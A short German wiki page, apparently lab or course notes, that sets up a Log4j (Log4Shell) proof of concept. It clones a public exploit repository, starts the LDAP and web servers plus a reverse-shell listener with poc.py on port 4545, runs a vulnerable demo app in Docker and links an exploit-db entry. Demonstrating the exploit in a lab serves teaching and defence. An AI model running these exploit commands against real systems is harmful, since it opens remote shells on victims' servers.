Log4j

Aus Xinux Wiki

Version vom 17. Dezember 2021, 12:09 Uhr von Thomas.will (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Schaubild

drawio: log4j

Proof of Concept

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc

Download und entpacken

jdk-8u20-linux-x64.tar.gz

Starten des LDAP und Webservers

python3 poc.py --userip brian.x-men.de --webport 8000 --lport 4545

Remoteshell listining

App starten eventuell auf anderem Rechner

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc

Webseite öffnen

Exploit

https://www.exploit-db.com/exploits/50592

Abgerufen von „http://wiki.ixheim.de/index.php?title=Log4j&oldid=30589“